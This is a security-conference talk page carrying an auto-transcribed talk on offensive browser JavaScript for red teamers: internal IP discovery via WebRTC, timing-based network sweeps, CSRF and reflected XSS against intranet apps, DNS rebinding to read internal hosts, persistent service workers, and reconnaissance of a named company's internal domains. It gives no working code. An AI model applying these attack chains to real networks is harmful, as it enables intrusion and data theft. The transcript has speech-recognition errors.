← All talks

BSidesSF 2021 - Offensive Javascript Techniques for Red Teamers (Dylan Ayrey • Christian Frichot)

BSidesSF · 202142:091.2K viewsPublished 2021-03Watch on YouTube ↗
Speakers
Tags
CategoryTechnical
TeamRed
StyleTalk
About this talk
Dylan Ayrey, Christian Frichot - Offensive Javascript Techniques for Red Teamers (Or Anyone Really) (This is an updated version of a talk previously presented at BSidesSF 2019 -- https://www.youtube.com/watch?v=HfpnloZM61I) AppSec is often very heavily focused on pre-exploitation. Frameworks like BeEF break this norm a little and can be used as tools to move laterally from the browser, to implant malware on adjacent machines. Unfortunately, performing network reconnaissance with JavaScript becomes tricky if the victim doesn't keep the tab open for long. This presentation will discuss relatively new techniques and features of JavaScript that have made it easier for sophisticated threat actors to craft JavaScript payloads that target internal network vulnerabilities, as fast as a person can think to close a tab. We'll also show new reconnaissance techniques traditionally used by red teams, post-malware implant, that can be used to get a foothold onto a network from a browser, pre-malware implant. We'll also show some real examples of this, crafting external payloads that target internal assets at large companies, and we'll show how responsible disclosure for intranet facing bugs typically gets resolved.
Show transcript [en]

[Music] ah g'day everyone uh we are really happy to be able to present to you our presentation that um we presented at besides sf back in 2019 awesome can everyone can everyone hear me with my funny rock and roll microphone test test okay cool we thought we would take this opportunity to like re-record bits and pieces of it and make it a little bit more slick at a high level what we want to talk about is trying to shift this mindset of javascript being you know being a language that people maybe don't think very highly of and instead trying to bring it into the realm of uh offensive security testers and red teamers and bug bounty hunters let's do some

intros my name's dylan i've worked at a number of large tech companies i've open sourced a number of popular tools and i've spoken at a number of large popular conferences including defcon 2018 and defcon black cat of 2020. my name is christian frischo i recently moved back to australia after spending a few years working up in the bay area for a couple of software companies and startups and now currently work for hashicorp remotely doing product security style work uh before that i was fortunate in that i got to contribute to some projects such as the browser exploitation framework and also the browser hackers handbook published by wiley okay so first a little bit of context

in 2018 christian i originally gave this talk on stage at kiwicon in front of a live audience and we did something that i would consider fairly gross and i told christian we really did not need to do it again for this talk but despite my best efforts

um

we have to get on to some actual content this talk is about moving from javascript running in a web browser to a malware implant running on a server behind your private network as quickly as possible we're going to talk about how we can do that using some javascript apis that include fetch webrtc service workers and a couple of others and we're going to augment it with some red teaming reconnaissance techniques to make it as efficient and quick as possible and of course we can't forget all the other javascript features such as mathml svg canvas index database api file api media capture api web sockets web workers geo location api offline api web notifications webgl web assembly web usb

web pretty much everything [ __ ] web browsers and one of the topics that we'll talk about a little bit later on is that actions can be performed cross-origin despite the controls in place in in browsers with regards to the same origin policy let's rewind the clock to the early 2000s there used to be a time when an attacker used to be able to just directly and very easily find a vulnerability like a sql injection or remote code execution that could just directly give them access to the production database and give them access to all of the user data passwords and payment information for all the different users in the system over time defensive application security

has gotten better in these regards and it's a lot more difficult to find these types of vulnerabilities that just directly take you to the most juiciest data but offensive techniques have also evolved today sophisticated malware frameworks can be used to pivot laterally through an environment where you may start an attack chain with a malware implant on a developer's laptop kicked off by a spearfishing campaign that infected laptop can be used to compromise other internal servers and because many services on the inside of company networks are less secured than the servers on the outside of a company's network the attacker can use their arsenal of malware exploits to move from the original compromised laptop to an

internal server to another internal server to another internal server until eventually they get access to the same juicy data that they used to be able to get access to through a single vulnerability through these post-exploitation malware frameworks it's still very easy for an attacker to get access to the data they're looking for and this remains an unsolved problem in the industry today most organizations suffer from this problem that we've coined the lobster security fallacy it's often called the cadbury cream egg fallacy and the idea is that an organization's security controls are often hard on the outside and then really really soft and delicious on the inside and all of this really comes back to that initial

foothold like how you can get access into a network and how things like the prevalence of web browsers and their connectivity to multiple networks and you know thousand tab fatigue syndrome these are all interesting avenues that you know someone with some malintent uh could take advantage of the first item obviously on the attacker's to-do list in these scenarios such as making a user click a link um there's many different ways that this can occur over the last few years we've seen prevalence of things like phishing and social engineering random website compromises water and hole style attacks even you know all the way through to more complicated web app vulnerability related problems such as monster-in-the-middle style attacks

or cross-site scripting and things like that here's some interesting information from one of the verizon data breach reports if that initial malicious email contains a malware attachment there's about a 12 percent chance of the user downloading that attachment and detonating it but that initial phishing email just contains a link that takes the victim to malicious javascript there's about a 30 chance that that victim will click that link and so we really have to ask ourselves just how bad can clicking a link be we think that it is bad it can potentially be quite bad yeah and there's also some misconceptions around opening up links in incognito windows and things like that and it should be worth noting that

all of the attacks that we're going to be going over today can be performed in an incognito window just the same if we look at what a client-side javascript based attack flow might look like you can start to to layout this pathway of these escalating steps that can occur inside of inside of the document object model user clicks a link bad website you know gets the user's internal ip address bad website then uses that information to try and sweep across that network you know in spite of the same origin policy then javascript try to exploit some stuff based on the limited information that it may have and i think looking at browsers in this way

as an attack surface is really really interesting because if you think about it your your web browser is connected to probably at least three different networks at any one time um you know it'll be connecting to the local network uh potentially through something like wi-fi it might be able to connect to the internet through wi-fi or through like four or five g um and also it will be able to access things like the loop back on the computer or even on the phone itself and let's not forget about the potential for your mobile phone to also roam from local network to local network to local network as you might move around between your personal wi-fi

at home or your corporate wi-fi at work so a few times we've mentioned the same origin policy and we've mentioned it's not going to be an issue for us for jumping from a malicious website on the internet to an internal server to understand why this is the case let's jump in a little bit to an example and see if we can wrap our heads around the same origin policy to start out i'm running a local web server on the loopback interface and i've browsed to a malicious website evil.com i've also pulled up console here so we can run javascript commands from the context of evil.com we'll start with a simple example i'll just send a

post request to evil.com from evil.com using the fetch api it goes out without any issues next i'll make it a little bit more interesting by reading the response and again we can see we're able to read and log the response here without any issues now to make things a little bit more interesting let's send a post request to the web server that i have running locally what's interesting here is we do see an error after we send the post request there's a message here that talks about cores but if we check the server logs we'll see that a post request actually was sent to the server because http requests are meant to be these really stateless

request response one and done transactions from the web server's perspective they don't know which origin the request originated from they just see the post request and that's kind of the end of the story but now the browser is throwing this funny error but if the request already went through what's the error all about well to understand that let's try to read the response from the web server now all of a sudden when we try to read the response from the post request we're unable to we can't log the response we get the same error that we got before let's try one more example now i'll change the method from post request to a put request

and we'll try the same thing now something really interesting happens in the server's logs we no longer see that a put request went through instead we see an options request went through that's not what we asked for we asked for a put request so what's going on here why is it that we're allowed to send some requests across origin but not allowed to send other requests and what's the deal with being able to read responses in the context of web browsers the same origin policy is one of the better controls that we have to constrain the execution environment of javascript in in one tab from being able to kind of interact with data from a different

different site or origin you might have two tabs open and obviously javascript in a google tab should not be able to interact with an api or a service or even javascript itself which is on like a facebook facebook origin at a very high level they're split into what we call simple http requests and non simple http requests a simple http request might be something as simple as when you click submit on a form and that data gets posted to like a url and pretty much non-simple http requests are kind of almost everything else you know a good example would be is if that you wanted to submit using javascript a request to an origin that maybe included some custom http

request headers what actually happened is that before the web browser actually submits the legitimate request it sends and options a http options request to that target origin to try and get you know basically say hey do i have the permission to perform this request and what that's actually doing is it's shifting the control to the target origin to basically allow them to kind of specify whether they're able to um retrieve your requests or not understanding all of that helps us understand what the same origin policy is and you can already start to see that there are some ways which we can jump from a malicious website to a local web server in spite of the same origin

policy's restrictions the differentiators between a simple http request and a non-simple http request can sometimes seem a little arbitrary check out this resource from mozilla to see the full breakdown but at a high level a get request or a post request with no extra headers or anything modifying it outside of what a regular form post would be able to do is a simple http request even if it's initiated from javascript some cross-origin requests can be used to exploit vulnerabilities so for instance cross-site request forgery is a good example in these instances you can actually submit the request and you don't you might not even care what the response comes back if that request is actioned on by the

server that might be good enough for you as the attacker to be able to proceed with your chain of attack which is where anti-sea surf tokens have become a very common control to protect against that the other thing that obviously sap doesn't really help too much out with is dns rebinding which we'll cover a little bit more later now at a high level the idea behind the same origin policy was that it should be able to prevent and control data that can that can be sent from origin to origin but the nuance of how it actually works and how browsers work there are always use cases where even sending http simple requests such as requesting an image

that will obviously always go without this pre-flight request and what's interesting in those circumstances is you're still effectively sending a cross-origin request and even though you might not be able to get data back it still does leak timing information most importantly for our purposes these csrf attacks and timing leaks can be used to jump from one network to another network as was shown in our example where we started on a website that was on the open internet and were able to send a post request to a web server running on a private network in this case the loopback interface but really it could be sent to any network that the device whether it's a phone or a laptop is

currently connected to so one of the concepts that we really liked and was kind of trying to think about cross-site request forgery in a different lens and instead of trying to use it to target an individual and make them perform some action against their own personal account in some web application and we thought it's more interesting to think about this in the context of attacking infrastructure you know not just using sea surf attacks to attack users but but against like bigger things that may be users within a corporate network and that's kind of one of the one of the ideas behind beef it was really about this beach head of having a browser inside of a secure context and telling

them to perform actions when we start to look at exploiting cross-site requests forgery attacks in the context of a greater environment than just a user's web browser and their their current authentication status to like a web app this starts to look really interesting because now we've got this ability to be able to send requests that are potentially bypassing net controls that may be in place such as firewalls you might be in an environment where there's a whole bunch of colleagues who happen to be sitting on the same network and potentially they're running local insecure stuff on their developer workstations you know as we kind of touched on before with the lobster fallacy it's very typical that your your laptop

or your computer when it's in your corporate network has access to servers and resources that definitely were not designed or secured against the internet it kind of comes back to that hard perimeter but soft from the inside but once you kind of get some control of any origin inside of a corporate network you can potentially start interacting with these other servers on internal networks so for those that haven't ever spent time using the browser exploitation framework this is a look at what the ui is when you start and log into beef in this example i am hooking an android mobile phone into the framework and once they're hooked in you'll see them appear on the

left hand side under the online browsers if you click on a browser the first thing you'll basically receive is all this information associated with that hooked browser context so the the date stamp the the reported name of the browser which may include like the phone type you can click through to the next page and you can potentially see some other information that's kind of somewhat passively been acquired from from that hooked uh browser origin from the commands tree there's a bunch of different commands that you can execute but the one that we're interested in is this get internal ip with webrtc so a little bit of background on web real-time communications the intent behind this technology

was to provide a mechanism for browsers you know in a cross-browser style method to be able to connect to each other and stream media or other data channels between each other webrtc had to implement some mechanisms to allow browsers to connect to each other and a part of that was effectively this protocol called ice or the interactive connectivity establishment protocol now for this to work what actually had to happen was the browser had to query a local api to effectively figure out what all the local ip addresses were you might have a number of computers that are actually on a pretty local network and for them to talk to each other directly you don't even need to have

that communication go out through the internet for that obviously to work you have to be able to determine your local ip addresses between the time of when dylan and i first put this presentation together for kiwicon and now there have actually been some privacy enhancing changes being made to some of the mechanisms used by webrtc inside of modern browsers the method that they've used to to prevent the leakage of internal ip addresses has been fully implemented inside of desktop browsers but actually hasn't been implemented yet in mobile phones i wouldn't be surprised if this change will come through pretty soon now there's obviously other ways that that same information can be gathered it was just

interesting to see how you know the needle as far as browser security controls have been implemented is a thing that obviously does change over time what actually happens now is that when chrome for instance requests a local ip address it actually interacts now with a multicast dns service provider inside of the browser and effectively generates like a randomly generated multicast address that the browser will answer so if anyone's in the local network and then try to discover where that computer is the browser will actually respond now to multicast dns which is quite interesting future research topic um in this instance you can see that the execution of this has basically provided us with a 192.168

internal ip address and this is quite interesting because using that information we can actually use another module called ping sweep and we can feed it effectively like a range of ip addresses somewhat associated with the starting point of that initial hooked browser inside that phone and we can kick off a task that basically will get executed in that that hooked browser the ping sweep module is interesting in that it just tries to submit like a cross-origin style request to the target ip address and it then makes a kind of guess on how long that initial kind of request will either take to to error out or potentially return some content and using that information it can basically give you a

determination on whether or not a host is available that ip address or not so this is a really good example of javascript that's executing it's sending requests out across an origin and due to the way that the sop works we can actually make assumptions around information based on the timing of of data that may or may not come back now beef obviously has its challenges and limitations as well a really good example is what if the victim closes their tab at that point you potentially lose the javascript execution environment that maybe you were using to perform a reconnaissance or perform exploitation of internal resources and that's obviously not ideal and i guess like one of the things that we really wanted

to try and figure out was like how bad can it be if you can gain access to arbitrary javascript on a single victim you know within like a corporate network and maybe potentially you've only got about 60 seconds to execute as much as you possibly can there's one other type of vulnerability that we need to touch on really briefly in the context of attacking infrastructure and that's cross-site scripting most people have heard of cross-site scripting and the reason is it's according to hacker one the most popular web vulnerability it's so popular that apsec teams have actually in my experience grown a little bit numb to it at a high level cross-site scripting is basically gaining

untrusted javascript execution on a trusted website so when an attacker can run javascript on an origin they shouldn't be able to run it on that's cross-site scripting now in its typical form it's used to attack other clients but again let's frame this in the context of being able to attack a server first let's look at a quote from hacker one in this quote they heavily imply stored cross-site scripting is generally more severe than reflected cross-site scripting the difference between store cross-site scripting and reflected crossfit scripting is stored cross-site scripting is when you manage to get one of these unsafe javascript payloads saved into a database it can later be read back out and executed in their safe browsing

environment reflected cross-site scripting is when the cross-site scripting payload is in the url so you can see why some apsec engineers may just assume that the stored cross-site scripting is more severe because it persists but let's think about this from the perspective of a private network let's say i an attacker want to trigger cross-site scripting on a victim based on the fact that they have access to an internal service i'll pick an example internal service let's say jenkins and let's say the attacker has advanced knowledge both that this victim is sitting on a network that has access to this jenkins server and the attacker has obtained a reflective cross-site scripting for jenkins in this scenario all the attacker needs

to do is send a link to the victim and if clicked it'll detonate the cross-site scripting from behind the private network in the jenkins environment and because we're talking about jenkins that means that that javascript will be able to interact with jenkins in a way that will get arbitrary code execution on the server jenkins by design allows users to run arbitrary code so being able to impersonate a user's javascript enables the attacker to be able to run arbitrary code on the server but what would this look like in the case of stored cross-site scripting well in that example the attacker would need some way to get that cross-site scripting payload saved into the database and remember

they don't actually have direct access to this web app it's behind a private network so in this particular example of attacking infrastructure reflected cross-site scripting is actually much more valuable to an attacker than a stored cross-site scripting it's also kind of interesting that if we look up the vulnerability ratings for cross-site scriptings historically against jenkins they've all been pretty low severity as opposed to a remote code execution vulnerability which might have a max 10 out of 10 severity this is interesting because across site scripting not only equates to remote code execution but through the browser's usage of multiple networks can be leveraged in a way that enables an attacker to gain that code execution even though they don't have direct

access to the network in that capacity a reflective cross-site scripting in jenkins can actually be more dangerous than certain types of remote code executions at this point you're probably wondering okay you might be able to construct these urls with cross-site scripting in them and attack a company if you knew what the internal host names were and you knew where people were running their jenkins and things like that but if you're trying to attack a company you wouldn't know any of that stuff ahead of time so how is any of this helpful this is where some red teaming reconnaissance starts to enter the picture we'll go over a few different tools that are going to be useful in figuring out

what these internal host names are but before we get into that we need to pick a target company now there's basically no way for us to do this without somebody getting a little bit mad at us so i'm sorry pinterest now it's worth noting that neither christian nor myself have ever worked at this target company and for no reason other than just needing an example we decided to pick on pinterest there is nothing extra vulnerable about them if anything this is categorically an example silicon valley company that roughly matches what you would find running these same recon techniques on any other major company you can think of to start things out i'm going to show

off a tool called risk iq risk iq uses a technique called passive dns to collect a bunch of data and information on lots of different websites the way passive dns works is they have some sort of tap in internet infrastructure and they watch dns queries fly over the wire because dns queries are not encrypted they're able to see this data and collect it and then use it for their product so we'll start just by searching pinterest at this point we can see that there are a bunch of ssl certificates that risk iq has observed and what's interesting here is you can expand them and see all their different fields and risk iq allows you to actually do

reverse searches on all of the fields on the ssl certificate so when we see the organization name for this certificate is pinterest we can actually do a reverse search on that and we can see every other ssl certificate that uses the name pinterest for the organization name this takes us to a domain called pin admin pin admin as it turns out is one of the domains that pinterest uses internally to host some of their internal tools you might be thinking that they can just remove some information from their ssl certificates to make this a little bit harder to find but the reality is this information actually leaks out a number of different places one tried

and true way that i like to find internal host names is through the company's mobile applications typically speaking information leaks out in the mobile application because it's designed to function both on the internet and in an internal test environment and so we can often find references to that test environment buried in the app to uncover that we can use an apk decompiler to get access to some of the raw java class files that contain information leaks that we'd be looking for after we've downloaded the decompiled java code we can just run some simple string graphs and sure enough here again we can find a reference to pin admin other simple way we can get access to

this hostname is if we just head over to pinterest's github and search their organization we can again find dozens of references to pin admins scattered throughout their open source code lastly there's a tool called cert graph and i've invited ian foster the author of cert graph to show off how the tool works and how it can help us find more domains geograph is an open source intelligence tool to enumerate related domain names by drawing the graph of publicly trusted certificate alt names there are many sources it can pull data from but by far the richest is certificate transparency certificate transparency is a publicly auditable log of all trusted sell certificates including internal lcl certificates and

internal domain names surecraft works by finding all the slicks for a provide domain name finding all the alt name domains lists and all the certificates getting all their certificates and entering appropriately this can allow starcraft to write lots of related domain names and sub domain names shared by the same entity that would otherwise be hidden for example this can help enumerate domains like pin admin.com from pinterest.com if they share an sml certificate or even if any chain of domain names and certificates is shared between them using dylan's example if you're on surecraft on pinadmin.com this reveals many other subdomain names of pinadmin.com as well as pin220.com which looks like another inching domain that might be worth

looking at there are a number of other tools that can be used to find internal domain names but let's shift our focus and look for subdomains at this point one popular tool i like using for this is sublister sublister in itself will actually use a whole bunch of other tools to find subdomains which includes searching virustotal for samples that people may have uploaded google dorking certificate transparency and a number of other things and using this we can find more than 200 internal subdomains of pin admin with this information there's one other type of attack that we briefly mentioned earlier and that's dns rebinding dns for binding in the context of a browser is another way to kind of skirt the same

origin policy if we look at the simplest definition of an origin it's the protocol the domain and the port notably the server's ip address is not a consideration when defining an origin this means that when the browser is doing dns resolutions to obtain an ip address if it performs a second dns resolution on the same host and the ip address changes the browser will consider it the same origin even though it's a different ip address let's think about this from the perspective of a malicious website you may browse to a malicious website which resolves to a public ip address that belongs to an attacker then the attacker might try to use the fetch api to have your browser make a

request to their domain however if the second resolution doesn't point to a public ip address anymore but instead points to an internal ip address the attacker has orchestrated a way to force a victim to send a request into an internal ip address while the browser still thinks it's talking to the same origin because it thinks it's talking to the same origin all the rules that we mentioned about simple and non-simple http requests go out the window and the attacker is freely able to make requests and view responses from whatever web server happens to be on the other side of that ip address likewise we can do something similar with a cname rebind instead of binding to an ip address we

can rebind to a cname and by doing this we can just c name to one of the hosts that we found in the previous enumeration this then enables an attacker to load a malicious webpage and then have a victim go to that malicious webpage and the javascript on that page is now free to send requests to internal hosts that the attacker doesn't otherwise have access to view the response and proxy it back out to the attacker the attacker can then use the victim's web browser to effectively form a proxy between them and the internal network that they sit on and view all the content that sits behind the private network that they can dns rebind

to there are a few limitations to this attack first and foremost is the hosts that the attacker is targeting can't be running ssl the reason is the domain will not match the domain that's listed on the certificate that's because the domain is still the attacker's domain therefore if you try to dns revine to an ssl website the browser will just get certificate errors and the attack won't work another limitation is some web servers such as django will actually do a host header verification specifically to prevent this type of attack if the django web server sees the malicious host header instead of the host header that the server is expecting it'll just drop the request additionally if there are any cookies

that are stored on the user those cookies will not be sent through because cookies are saved to domains not to ip addresses so to frame this whole attack you need an insecure web server internally that doesn't have authentication on it and that's actually pretty common it would almost wager to say common enough that if we were to rebind to all of the host names that we were defined in the enumeration step we would almost certainly be able to exfiltrate some data that we shouldn't be able to here's another limitation the dns cache on a browser is actually 60 seconds so you need to keep a victim on the page for 60 seconds to be able to

perform this attack that does not mean if you're targeting 200 domains you need to wait 60 seconds for each domain instead we can get around this by iframing 200 different iframes in the background and having each one of them point to a different malicious domain and then at the end of the 60 seconds we'll rebind them all at the same time and steal all the content from each of the iframes let's look at a brief example of this so to frame the context i've got two web servers running one of them is running on the open internet and one of them is running on loopback then i've got a secret file called secret.text on the loopback web server

that if visited secret.text you'll see that there's some secret text here that we don't want strangers on the internet to get okay with that context let's visit the website on the internet and take a look at the javascript to see what it's doing so we can see there's some very simple javascript here that's just trying to pull the origin for the page every second and remember the ip address is not a part of the definition of an origin so when we check the server logs we can see that the remote server is getting pulled once a second now fast forward a little bit for 60 seconds for when the dns cache in the browser expires

when the browser does a second dns lookup instead of returning the public ip address again instead it's going to return one two seven zero zero one or the loopback interface and all of a sudden we can see this very simple javascript that's just polling window.origin jumps from the remote web server to our local web server and if we look at the ip address in the logs we can see the remote web server was seeing an ip address come from the open internet but the local web server sees that the request is coming from within the loopback interface and all of this allows the javascript which was loaded from the remote untrusted server to actually read the

slash secrets file on the local web server now in this example i've just written it to the dom but you could imagine it being exfiltrated out to the malicious attacker at this point and you can imagine how we can use this to basically skirt the same origin policy another browser technology that we have up our sleeves when operating in like a short window of time is service workers service workers have been around in in modern web browsers for for a few years now and the intent behind service workers was to allow web applications to continue functioning even to some degree while the computer or the browser is no longer connected to the network this is implemented by having

somewhat like a background javascript execution environment and it's really quite interesting in that they often have the capability to continue functioning even after tabs is in fact closed they have some constraints in how they operate in general service workers must operate over tls except if you're developing on localhost they don't often operate with mixed content um and also they they also function in a somewhat sandboxed environment with a with a limited subset of javascript there has been some interesting research though performed by claudio and emanuel they did some research for kiwicon a few years ago and then also presented at def con and black at arsenal where they had used some tricks to actually coerce

service workers to continue functioning in some circumstances up to 30 minutes and if you think about it 30 minutes is definitely a long time to be able to execute arbitrary javascript so i have a very simple service worker example here that's actually available on github if you want to check it out and if we look at the source code all we're doing is basically loading a very simple service worker that just pulls localhost every second and we can see i have a web server running in the background here and when i visit the website we'll see that polling kick off and see that there's a request made every second but then when i close the tab it doesn't

stop the polling will continue and so you can imagine using this to launch csrf attacks against either loopback or ssl websites from internal networks and being able to persist these types of attacks even after the tap gets closed with all of this context let's go over a few real world examples that i was able to identify using the techniques that we've gone over so far to find vulnerabilities in companies internal infrastructure and report them through bug bounty programs one example is using the reconnaissance techniques we talked about i found a company was running a piece of software called review board internally review board is a piece of open source software that's designed for code review

so i was able to pull it down and run it locally and i had access to the source code which makes finding vulnerabilities a little bit easier because this is meant to run internally it doesn't have the same amount of scrutiny as edge-facing apps would and because cross-site scripting and cross-site request forgery are such common vulnerabilities it wasn't difficult to find vulnerabilities against this application when put together i was able to construct a link that if clicked would use cross-site request forgery to install a stored cross-site scripting on the application that stored cross-site scripting could then be used to steal all of the source code of the company so end to end it's a link that if

clicked steals all the company's source code even though i didn't have access to review board when i disclosed this vulnerability the company decided that because they didn't write the code for review board they weren't going to pay for it i notified the maintainer's review board about the vulnerabilities and they got it patched and they credited me in the release notes here's another example there's another open source tool called geocd this is a devops tool that configures environments internally i used the same formula as before i pulled it down i ran it locally and i took a look by default the application has no authentication and that's an easier thing to exploit from an attacker's standpoint because it

means anyone on the network can click it and the victim doesn't have to be authenticated to the app to be able to trigger csrf attacks i found for the most part the application actually used sea surf tokens to prevent against csrf but there was one endpoint for creating environments that did not have c-surf protection in this case i actually knew the person running the bug bounty and i reached out to them ahead of time and asked if this was worth submitting they mentioned something similar to the first example that because they didn't write this code and because it's not in the scope of the bug bounty it would not be worth submitting and so i didn't here's one more example

and it follows the same formula i found that a company was running a piece of software called global site internally global site is an open source piece of software that i was able to pull off sourceforge run locally and look at the source code for i was able to find a lot of vulnerabilities in this application and among them included a reflected cross-site scripting and a remote code execution vulnerability that was due to being able to upload a web shell to a file upload endpoint when combined i now have a link that if someone clicks the reflected cross-site scripting can be used to upload the web shell and detonate the payload for the web shell and now we've gained shell access

to a web server that we have no direct access to otherwise when submitting this vulnerability this company treated it differently than the first two companies did and they recognized the security impact to their organization and decided to pay out for the vulnerabilities i also worked with the upstream vendor in this case to get it patched hopefully this demonstrates how easy this formula is to be able to construct urls that can cause some pretty nasty damage inside of companies networks let's back up now and take the 10 000 foot view of all the different things we've talked about so far our main goal here is to see what's possible just through clicking a link and keeping

a victim on a page for 60 seconds so let's walk through a user story and see what that could look like covering all the different things that we've talked about the first thing we're able to do is grab the user's internal ip address using the webrtc api we'll assume that this phishing email was clicked via a mobile phone making this attack possible using this ip address we're able to immediately begin a timing based attack to search other ip addresses that are within the same slider range for potential services that might be running on those hosts in parallel with that we can kick a service worker off that's able to run for many minutes in the background even after the victim has

closed the tab that service worker is then allowed to send cross-origin requests to all the https websites that we've been able to identify through our enumeration and reconnaissance step this could include any csrf attacks that we may have against these hosts and we can interrogate them to see which ones are still active again through timing leaks additionally any cross-site scripting attacks that we're able to construct ahead of time based on the recon that we've done against the company we can launch those as well we might have to be a little bit sneaky about them but usually we can get away with it by either i-framing the reflected cross-site scripting payload in an invisible iframe or by launching a

pop-up or by sticking it in another tab while that's all going on our dns rebind clock is also started and what we're able to do there is we're able to iframe malicious domains for all of the hosts that we were able to identify from the ping sweep as well as cname rebinds for all the hosts we're able to identify from our enumeration step as long as they don't have ssl in 60 seconds we'll be able to grab all of the content from all of those different hosts and proxy it back to the attacker also priming the attacker for subsequent requests against those hosts in concert what we end up with is several avenues both to steal data

and install backdoors into internal infrastructure we also have several different avenues for persistence including persistence on the victim's web browser through the use of service workers and persistence on the servers that we're attacking potentially through web shells csrf that allows us to store cross-site scripting or remote code execution and we could do all of this even if the victim opened up the tab in an incognito window just through the virtues of the phone sitting on multiple networks in closing we think it's worth reiterating some of the reasons why we think web browsers are a really interesting target that you should be looking at on your next engagement either as part of a bug bounty or a

penetration test firstly browsers operate in multiple different contexts and origins and you should be using these as part of your assessments don't forget like they're you know modern web browsers are very mobile and they they shift from network to network and it's not like those those browser tabs are closing as the the computer or the mobile phone is moving around recon work for internal systems is also really really important and we think it's very valuable to spend time looking at open source products as well finding web application security vulnerabilities on internal systems can can reap a lot of um reward and don't forget new browser features are coming out all the time they often play a bit of tug and war

between you know features that can provide new functionality to users but also toe the line of potentially privacy impacting style scenarios so you know keeping across what's happening in the browser space is obviously very useful as well and please like do test your internal apps just because there's a firewall there doesn't doesn't mean that you're protected [Music] b [Music] so [Applause] you